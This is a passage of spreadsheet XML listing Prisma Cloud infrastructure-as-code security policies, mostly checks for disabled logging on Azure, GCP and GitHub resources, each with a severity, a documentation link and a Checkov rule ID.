      </c>
      <c r="W1266" t="inlineStr">
        <is>
          <t>Ensure Storage logging is enabled for Blob service for read requests</t>
        </is>
      </c>
      <c r="X1266" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-blob-service-for-read-requests</t>
        </is>
      </c>
      <c r="Y1266" t="inlineStr"/>
      <c r="Z1266" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["azurerm_storage_container","azurerm_storage_account","azurerm_log_analytics_storage_insights"]}</t>
        </is>
      </c>
      <c r="AA1266" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1266" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1266" t="inlineStr">
        <is>
          <t>CKV2_AZURE_21</t>
        </is>
      </c>
      <c r="AD1266" t="b">
        <v>1</v>
      </c>
      <c r="AE1266" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1266" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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6" t="inlineStr">
        <is>
          <t>02cd347f-9091-4cb3-a221-e9f0e1cebabf</t>
        </is>
      </c>
      <c r="AI1266" t="inlineStr"/>
      <c r="AJ1266" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1266" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1267">
      <c r="A1267" t="inlineStr"/>
      <c r="B1267" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1267" s="2" t="inlineStr"/>
      <c r="D1267" t="inlineStr"/>
      <c r="E1267" t="inlineStr"/>
      <c r="F1267" t="inlineStr"/>
      <c r="G1267" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1267" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-storage</t>
        </is>
      </c>
      <c r="K1267" t="inlineStr">
        <is>
          <t>Azure storage account logging setting for tables is disabled</t>
        </is>
      </c>
      <c r="L1267" t="inlineStr"/>
      <c r="M1267" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1267" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1267" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1267" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1267" t="inlineStr"/>
      <c r="R1267" t="inlineStr"/>
      <c r="S1267" t="inlineStr"/>
      <c r="T1267" t="b">
        <v>0</v>
      </c>
      <c r="U1267" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1267" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-storage-table,azure-storage-account,azure-log-analytics-storage-insights</t>
        </is>
      </c>
      <c r="W1267" t="inlineStr">
        <is>
          <t>Ensure Storage logging is enabled for Table service for read requests</t>
        </is>
      </c>
      <c r="X1267" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-table-service-for-read-requests</t>
        </is>
      </c>
      <c r="Y1267" t="inlineStr"/>
      <c r="Z1267" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["azurerm_storage_table","azurerm_storage_account","azurerm_log_analytics_storage_insights"]}</t>
        </is>
      </c>
      <c r="AA1267" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1267" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1267" t="inlineStr">
        <is>
          <t>CKV2_AZURE_20</t>
        </is>
      </c>
      <c r="AD1267" t="b">
        <v>1</v>
      </c>
      <c r="AE1267" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1267" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>cf24f5cf-c1c0-4029-943f-b61620a7d893</t>
        </is>
      </c>
      <c r="AI1267" t="inlineStr"/>
      <c r="AJ1267" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1267" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1268">
      <c r="A1268" t="inlineStr"/>
      <c r="B1268" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1268" s="2" t="inlineStr"/>
      <c r="D1268" t="inlineStr"/>
      <c r="E1268" t="inlineStr"/>
      <c r="F1268" t="inlineStr"/>
      <c r="G1268" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1268" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-synapse</t>
        </is>
      </c>
      <c r="K1268" t="inlineStr">
        <is>
          <t>Log monitoring disabled for Azure Synapse SQL Pool</t>
        </is>
      </c>
      <c r="L1268" t="inlineStr"/>
      <c r="M1268" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1268" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1268" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1268" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1268" t="inlineStr"/>
      <c r="R1268" t="inlineStr"/>
      <c r="S1268" t="inlineStr"/>
      <c r="T1268" t="b">
        <v>0</v>
      </c>
      <c r="U1268" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1268" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-synapse-sql-pool</t>
        </is>
      </c>
      <c r="W1268" t="inlineStr">
        <is>
          <t>Ensure log monitoring is enabled for Synapse SQL Pool</t>
        </is>
      </c>
      <c r="X1268" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/bc-azure-2-54</t>
        </is>
      </c>
      <c r="Y1268" t="inlineStr"/>
      <c r="Z1268" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["azurerm_synapse_sql_pool"]}</t>
        </is>
      </c>
      <c r="AA1268" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1268" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1268" t="inlineStr">
        <is>
          <t>CKV2_AZURE_54</t>
        </is>
      </c>
      <c r="AD1268" t="b">
        <v>1</v>
      </c>
      <c r="AE1268" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1268" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>8837d8fa-2334-4035-b6ef-5edbdfbbd43d</t>
        </is>
      </c>
      <c r="AI1268" t="inlineStr"/>
      <c r="AJ1268" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1268" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" t="inlineStr"/>
      <c r="B1269" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1269" s="2" t="inlineStr"/>
      <c r="D1269" t="inlineStr"/>
      <c r="E1269" t="inlineStr"/>
      <c r="F1269" t="inlineStr"/>
      <c r="G1269" t="b">
        <v>1</v>
      </c>
      <c r="H12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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1269" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-synapse</t>
        </is>
      </c>
      <c r="K1269" t="inlineStr">
        <is>
          <t>Azure Synapse Workspace does not have extended audit logs</t>
        </is>
      </c>
      <c r="L1269" t="inlineStr"/>
      <c r="M1269" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1269" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1269" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1269" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1269" t="inlineStr"/>
      <c r="R1269" t="inlineStr"/>
      <c r="S1269" t="inlineStr"/>
      <c r="T1269" t="b">
        <v>0</v>
      </c>
      <c r="U1269" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1269" t="inlineStr">
        <is>
          <t>IaC:Logging:azure-synapse-workspace</t>
        </is>
      </c>
      <c r="W1269" t="inlineStr">
        <is>
          <t>Ensure Azure Synapse Workspace has extended audit logs</t>
        </is>
      </c>
      <c r="X1269" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/bc-azure-2-53</t>
        </is>
      </c>
      <c r="Y1269" t="inlineStr"/>
      <c r="Z1269" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["azurerm_synapse_workspace"]}</t>
        </is>
      </c>
      <c r="AA1269" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1269" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1269" t="inlineStr">
        <is>
          <t>CKV2_AZURE_53</t>
        </is>
      </c>
      <c r="AD1269" t="b">
        <v>1</v>
      </c>
      <c r="AE1269" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1269" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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69" t="inlineStr">
        <is>
          <t>f62ba5d5-77ec-464c-92d9-572763798676</t>
        </is>
      </c>
      <c r="AI1269" t="inlineStr"/>
      <c r="AJ1269" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1269" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" t="inlineStr"/>
      <c r="B1270" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1270" s="2" t="inlineStr"/>
      <c r="D1270" t="inlineStr"/>
      <c r="E1270" t="inlineStr"/>
      <c r="F1270" t="inlineStr"/>
      <c r="G1270" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1270" t="inlineStr">
        <is>
          <t>IaC:Logging:google-dialogflow</t>
        </is>
      </c>
      <c r="K1270" t="inlineStr">
        <is>
          <t>Logging is disabled for Dialogflow agents</t>
        </is>
      </c>
      <c r="L1270" t="inlineStr"/>
      <c r="M1270" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1270" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1270" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1270" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1270" t="inlineStr"/>
      <c r="R1270" t="inlineStr"/>
      <c r="S1270" t="inlineStr"/>
      <c r="T1270" t="b">
        <v>0</v>
      </c>
      <c r="U1270" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1270" t="inlineStr">
        <is>
          <t>IaC:Logging:google-dialogflow-agent</t>
        </is>
      </c>
      <c r="W1270" t="inlineStr">
        <is>
          <t>Ensure logging is enabled for Dialogflow agents</t>
        </is>
      </c>
      <c r="X1270" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-google-cloud-2-29</t>
        </is>
      </c>
      <c r="Y1270" t="inlineStr"/>
      <c r="Z1270" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["google_dialogflow_agent"]}</t>
        </is>
      </c>
      <c r="AA1270" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1270" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1270" t="inlineStr">
        <is>
          <t>CKV2_GCP_29</t>
        </is>
      </c>
      <c r="AD1270" t="b">
        <v>1</v>
      </c>
      <c r="AE1270" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1270" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>4786106e-05b8-4184-b650-b10fa6b1b6a0</t>
        </is>
      </c>
      <c r="AI1270" t="inlineStr"/>
      <c r="AJ1270" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1270" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1271">
      <c r="A1271" t="inlineStr"/>
      <c r="B1271" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1271" s="2" t="inlineStr"/>
      <c r="D1271" t="inlineStr"/>
      <c r="E1271" t="inlineStr"/>
      <c r="F1271" t="inlineStr"/>
      <c r="G1271" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1271" t="inlineStr">
        <is>
          <t>IaC:Logging:google-dialogflow</t>
        </is>
      </c>
      <c r="K1271" t="inlineStr">
        <is>
          <t>Logging for Dialogflow CX agents is disabled</t>
        </is>
      </c>
      <c r="L1271" t="inlineStr"/>
      <c r="M1271" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1271" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1271" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1271" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1271" t="inlineStr"/>
      <c r="R1271" t="inlineStr"/>
      <c r="S1271" t="inlineStr"/>
      <c r="T1271" t="b">
        <v>0</v>
      </c>
      <c r="U1271" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1271" t="inlineStr">
        <is>
          <t>IaC:Logging:google-dialogflow-cx-agent</t>
        </is>
      </c>
      <c r="W1271" t="inlineStr">
        <is>
          <t>Ensure logging is enabled for Dialogflow CX agents</t>
        </is>
      </c>
      <c r="X1271" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-google-cloud-2-30</t>
        </is>
      </c>
      <c r="Y1271" t="inlineStr"/>
      <c r="Z1271" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["google_dialogflow_cx_agent"]}</t>
        </is>
      </c>
      <c r="AA1271" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1271" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1271" t="inlineStr">
        <is>
          <t>CKV2_GCP_30</t>
        </is>
      </c>
      <c r="AD1271" t="b">
        <v>1</v>
      </c>
      <c r="AE1271" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1271" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>8a7d482c-be9d-489b-9830-f71e4692fa0a</t>
        </is>
      </c>
      <c r="AI1271" t="inlineStr"/>
      <c r="AJ1271" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1271" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1272">
      <c r="A1272" t="inlineStr"/>
      <c r="B1272" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1272" s="2" t="inlineStr"/>
      <c r="D1272" t="inlineStr"/>
      <c r="E1272" t="inlineStr"/>
      <c r="F1272" t="inlineStr"/>
      <c r="G1272" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1272" t="inlineStr">
        <is>
          <t>IaC:Logging:google-dialogflow</t>
        </is>
      </c>
      <c r="K1272" t="inlineStr">
        <is>
          <t>Logging for Dialogflow CX webhooks is disabled</t>
        </is>
      </c>
      <c r="L1272" t="inlineStr"/>
      <c r="M1272" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1272" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1272" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1272" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1272" t="inlineStr"/>
      <c r="R1272" t="inlineStr"/>
      <c r="S1272" t="inlineStr"/>
      <c r="T1272" t="b">
        <v>0</v>
      </c>
      <c r="U1272" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1272" t="inlineStr">
        <is>
          <t>IaC:Logging:google-dialogflow-cx-webhook</t>
        </is>
      </c>
      <c r="W1272" t="inlineStr">
        <is>
          <t>Ensure logging is enabled for Dialogflow CX webhooks</t>
        </is>
      </c>
      <c r="X1272" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-google-cloud-2-31</t>
        </is>
      </c>
      <c r="Y1272" t="inlineStr"/>
      <c r="Z1272" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["google_dialogflow_cx_webhook"]}</t>
        </is>
      </c>
      <c r="AA1272" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1272" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1272" t="inlineStr">
        <is>
          <t>CKV2_GCP_31</t>
        </is>
      </c>
      <c r="AD1272" t="b">
        <v>1</v>
      </c>
      <c r="AE1272" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1272" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>d839d6a4-9ac2-4135-8af6-2fc6a339a9d8</t>
        </is>
      </c>
      <c r="AI1272" t="inlineStr"/>
      <c r="AJ1272" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1272" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1273">
      <c r="A1273" t="inlineStr"/>
      <c r="B1273" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1273" s="2" t="inlineStr"/>
      <c r="D1273" t="inlineStr"/>
      <c r="E1273" t="inlineStr"/>
      <c r="F1273" t="inlineStr"/>
      <c r="G1273" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1273" t="inlineStr">
        <is>
          <t>IaC:Logging:google-sql</t>
        </is>
      </c>
      <c r="K1273" t="inlineStr">
        <is>
          <t>Log levels of the GCP PostgreSQL database are not set to ERROR or lower</t>
        </is>
      </c>
      <c r="L1273" t="inlineStr"/>
      <c r="M1273" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1273" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1273" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1273" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1273" t="inlineStr"/>
      <c r="R1273" t="inlineStr"/>
      <c r="S1273" t="inlineStr"/>
      <c r="T1273" t="b">
        <v>0</v>
      </c>
      <c r="U1273" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1273" t="inlineStr">
        <is>
          <t>IaC:Logging:google-sql-database-instance</t>
        </is>
      </c>
      <c r="W1273" t="inlineStr">
        <is>
          <t>Ensure the GCP PostgreSQL database log levels are set to ERROR or lower</t>
        </is>
      </c>
      <c r="X1273" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-google-cloud-109</t>
        </is>
      </c>
      <c r="Y1273" t="inlineStr"/>
      <c r="Z1273" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA1273" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1273" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1273" t="inlineStr">
        <is>
          <t>CKV_GCP_109</t>
        </is>
      </c>
      <c r="AD1273" t="b">
        <v>1</v>
      </c>
      <c r="AE1273" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1273" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>be41aab1-d2ea-47a0-802b-e1511109ec08</t>
        </is>
      </c>
      <c r="AI1273" t="inlineStr"/>
      <c r="AJ1273" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1273" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1274">
      <c r="A1274" t="inlineStr"/>
      <c r="B1274" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1274" s="2" t="inlineStr"/>
      <c r="D1274" t="inlineStr"/>
      <c r="E1274" t="inlineStr"/>
      <c r="F1274" t="inlineStr"/>
      <c r="G1274" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1274" t="inlineStr">
        <is>
          <t>IaC:Logging:google-sql</t>
        </is>
      </c>
      <c r="K1274" t="inlineStr">
        <is>
          <t>SQL statements of GCP PostgreSQL are not logged</t>
        </is>
      </c>
      <c r="L1274" t="inlineStr"/>
      <c r="M1274" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1274" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1274" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1274" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1274" t="inlineStr"/>
      <c r="R1274" t="inlineStr"/>
      <c r="S1274" t="inlineStr"/>
      <c r="T1274" t="b">
        <v>0</v>
      </c>
      <c r="U1274" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1274" t="inlineStr">
        <is>
          <t>IaC:Logging:google-sql-database-instance</t>
        </is>
      </c>
      <c r="W1274" t="inlineStr">
        <is>
          <t>Ensure GCP PostgreSQL logs SQL statements</t>
        </is>
      </c>
      <c r="X1274" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-google-cloud-111</t>
        </is>
      </c>
      <c r="Y1274" t="inlineStr"/>
      <c r="Z1274" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA1274" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1274" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1274" t="inlineStr">
        <is>
          <t>CKV_GCP_111</t>
        </is>
      </c>
      <c r="AD1274" t="b">
        <v>1</v>
      </c>
      <c r="AE1274" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1274" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>8136a48f-75a2-4e92-a102-fcc578a83cfd</t>
        </is>
      </c>
      <c r="AI1274" t="inlineStr"/>
      <c r="AJ1274" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1274" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1275">
      <c r="A1275" t="inlineStr"/>
      <c r="B1275" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1275" s="2" t="inlineStr"/>
      <c r="D1275" t="inlineStr"/>
      <c r="E1275" t="inlineStr"/>
      <c r="F1275" t="inlineStr"/>
      <c r="G1275" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1275" t="inlineStr">
        <is>
          <t>IaC:Logging:google-sql</t>
        </is>
      </c>
      <c r="K1275" t="inlineStr">
        <is>
          <t>pgAudit is disabled for your GCP PostgreSQL database</t>
        </is>
      </c>
      <c r="L1275" t="inlineStr"/>
      <c r="M1275" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1275" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1275" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1275" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1275" t="inlineStr"/>
      <c r="R1275" t="inlineStr"/>
      <c r="S1275" t="inlineStr"/>
      <c r="T1275" t="b">
        <v>0</v>
      </c>
      <c r="U1275" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1275" t="inlineStr">
        <is>
          <t>IaC:Logging:google-sql-database-instance</t>
        </is>
      </c>
      <c r="W1275" t="inlineStr">
        <is>
          <t>Ensure pgAudit is enabled for your GCP PostgreSQL database</t>
        </is>
      </c>
      <c r="X1275" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-google-cloud-110</t>
        </is>
      </c>
      <c r="Y1275" t="inlineStr"/>
      <c r="Z1275" t="inlineStr">
        <is>
          <t>{"category":"Logging","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA1275" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1275" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1275" t="inlineStr">
        <is>
          <t>CKV_GCP_110</t>
        </is>
      </c>
      <c r="AD1275" t="b">
        <v>1</v>
      </c>
      <c r="AE1275" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1275" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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5" t="inlineStr">
        <is>
          <t>98e4c06e-2ccb-4786-aa46-03b8ba450e45</t>
        </is>
      </c>
      <c r="AI1275" t="inlineStr"/>
      <c r="AJ1275" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1275" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1276">
      <c r="A1276" t="inlineStr"/>
      <c r="B1276" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1276" s="2" t="inlineStr"/>
      <c r="D1276" t="inlineStr"/>
      <c r="E1276" t="inlineStr"/>
      <c r="F1276" t="inlineStr"/>
      <c r="G1276" t="b">
        <v>1</v>
      </c>
      <c r="H12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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1276" t="inlineStr">
        <is>
          <t>IaC:Monitoring:github-repository</t>
        </is>
      </c>
      <c r="K1276" t="inlineStr">
        <is>
          <t>GitHub Repository defined in Terraform doesn't have vulnerability alerts enabled</t>
        </is>
      </c>
      <c r="L1276" t="inlineStr"/>
      <c r="M1276" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1276" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1276" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1276" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1276" t="inlineStr"/>
      <c r="R1276" t="inlineStr"/>
      <c r="S1276" t="inlineStr"/>
      <c r="T1276" t="b">
        <v>0</v>
      </c>
      <c r="U1276" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1276" t="inlineStr">
        <is>
          <t>IaC:Monitoring:github-repository</t>
        </is>
      </c>
      <c r="W1276" t="inlineStr">
        <is>
          <t>Ensure GitHub repository has vulnerability alerts enabled</t>
        </is>
      </c>
      <c r="X1276" t="inlineStr">
